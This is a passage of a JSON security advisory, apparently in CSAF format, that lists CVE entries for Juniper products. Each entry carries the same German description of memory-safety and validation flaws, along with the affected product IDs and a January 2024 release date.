"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2021-0920"
},
{
"cve": "CVE-2020-9493",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2020-9493"
},
{
"cve": "CVE-2020-12321",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2020-12321"
},
{
"cve": "CVE-2020-0466",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2020-0466"
},
{
"cve": "CVE-2020-0465",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2020-0465"
},
{
"cve": "CVE-2019-17571",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2019-17571"
},
{
"cve": "CVE-2016-2183",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2016-2183"
},
{
"cve": "CVE-2024-21617",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2024-21617"
},
{
"cve": "CVE-2024-21616",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2024-21616"
},
{
"cve": "CVE-2024-21614",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2024-21614"
},
{
"cve": "CVE-2024-21613",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2024-21613"
},
{
"cve": "CVE-2024-21612",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2024-21612"
},
{
"cve": "CVE-2024-21611",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2024-21611"
},
{
"cve": "CVE-2024-21607",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2024-21607"
},
{
"cve": "CVE-2024-21606",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2024-21606"
},
{
"cve": "CVE-2024-21604",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2024-21604"
},
{
"cve": "CVE-2024-21603",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2024-21603"
},
{
"cve": "CVE-2024-21602",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2024-21602"
},
{
"cve": "CVE-2024-21601",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2024-21601"
},
{
"cve": "CVE-2024-21600",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2024-21600"
},
{
"cve": "CVE-2024-21599",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2024-21599"
},
{
"cve": "CVE-2024-21597",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2024-21597"
},
{
"cve": "CVE-2024-21596",
"notes": [
{
"category": "description",
